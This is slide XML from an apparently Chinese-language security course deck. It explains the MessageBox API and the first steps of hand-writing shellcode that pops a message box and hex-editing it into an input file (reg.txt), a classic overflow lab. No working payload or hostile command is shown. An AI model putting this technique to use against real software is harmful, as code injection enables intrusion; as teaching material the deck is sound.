            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6397256" y="4301997"/>
                <a:ext cx="12370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000" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>lpCaption</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="组合 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36989F31-774D-4C4E-895D-8722223376F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6401569" y="5191306"/>
              <a:ext cx="5184576" cy="1058442"/>
              <a:chOff x="6357367" y="5191306"/>
              <a:chExt cx="5184576" cy="1058442"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="25" name="组合 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2ADD84-B71F-49A2-8899-7C93DED47E53}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6357367" y="5191306"/>
                <a:ext cx="5184576" cy="1058442"/>
                <a:chOff x="4933525" y="2542866"/>
                <a:chExt cx="5184576" cy="1058442"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="26" name="六边形 25">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253F608A-FC33-44D7-8907-C411C11BC906}"/>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lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="27" name="文本框 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA9C393F-4975-48BF-9534-D53444F862D9}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6984268" y="2564256"/>
                  <a:ext cx="313383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000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>消息框的风格（单按钮、多按钮等），</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>NULL</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1">
                          <a:lumMod val="75000"/>
                          <a:lumOff val="25000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:latin typeface="+mn-lt"/>
                    </a:rPr>
                    <a:t>代表默认风格。</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="28" name="直接连接符 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDE97CC8-ABAF-4B7B-BB2D-7C8D40B1D9A8}"/>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0" name="文本框 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5911E8-CA65-4BC4-93E9-1BF425E1CBF2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6606786" y="5528488"/>
                <a:ext cx="8585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000" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>uType</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5679FD62-751E-41D3-A652-EE24B8070A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1070366" y="1979096"/>
            <a:ext cx="5104344" cy="2480820"/>
            <a:chOff x="1297225" y="2710486"/>
            <a:chExt cx="5104344" cy="2480820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A26BA71-EEFD-4A11-BBEB-63FDE03A56D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505025" y="2782937"/>
              <a:ext cx="4896544" cy="2137380"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>int </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>MessageBox</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>HWND </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>hWnd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>,          // handle to owner window</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>LPCTSTR </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>lpText</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>,        // text in message box</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>LPCTSTR </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>lpCaption</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>,     // message box title</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>UINT </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>uType</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>            // message box style</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" kern="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形: 圆角 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD05D6B6-9586-4B38-8516-C0C426B14EA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1297225" y="2710486"/>
              <a:ext cx="5094712" cy="2480820"/>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3" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949374" y="4942173"/>
            <a:ext cx="5289950" cy="1172629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>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我们将写出调用这个</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API</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的汇编代码，然后翻译成机器代码，用十六进制编辑工具填入</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reg.txt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文件。</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30000"/>
              </a:lnSpc>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注意：使用</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MessageBoxA</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函数。</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83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0D98A0A7-16A2-492D-A55A-19B5647E7119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2210119" y="1740685"/>
            <a:ext cx="8756331" cy="1569660"/>
            <a:chOff x="5100541" y="2287259"/>
            <a:chExt cx="8756331" cy="1569660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="六边形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72A76738-ACC9-4AF5-9D4A-1E41F804D578}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5100541" y="2686890"/>
              <a:ext cx="893382" cy="770394"/>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itchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D28173-21BD-44A9-8B20-1EA8EF69418B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6984268" y="2287259"/>
              <a:ext cx="687260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rgbClr val="0050A3"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>装载动态链接库</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0050A3"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>user32.dll</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0050A3"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>MessageBoxA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>是动态链接库</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>user32.dll</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的导出函数。虽然大多数有图形化操作界面的程序都已经装载了这个库，但是我们用来实验的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>consol</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>版并没有默认加载它。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="直接连接符 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AF0458A-9D44-4E74-979F-A6C2E9D0603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19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4FB0EE5-E6A8-458F-9FE1-3CA02AECEF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999039">
            <a:off x="10480707" y="4989711"/>
            <a:ext cx="1920709" cy="1920709"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56D10B41-3824-4948-AFA3-7256B2F988D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2828975" y="837929"/>
            <a:ext cx="7200800" cy="474140"/>
            <a:chOff x="2828975" y="837929"/>
            <a:chExt cx="7200800" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6978420B-79F3-4824-8BD4-CFA1BB7B5C73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2828975" y="1312069"/>
              <a:ext cx="7200800"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CBED80BB-7341-4959-B54E-74E2D8E3677B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3150689" y="837929"/>
              <a:ext cx="6557373" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>用汇编语言调用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>MessageboxA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>需要三个步骤：</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C097E4C-27D8-4133-9D4A-E9C121DB67E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2210119" y="3421995"/>
            <a:ext cx="9084525" cy="770394"/>
            <a:chOff x="5100541" y="2686890"/>
            <a:chExt cx="9084525" cy="770394"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="六边形 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A5FD493-A974-4C9E-992B-CF06A1688FE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5100541" y="2686890"/>
              <a:ext cx="893382" cy="770394"/>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itchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D38C61F2-6CC8-4FB8-BAFB-551A1D36E3B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6984267" y="2841256"/>
              <a:ext cx="72007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latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>在汇编语言中调用这个函数需要</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0050A3"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>获得函数的入口地址。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
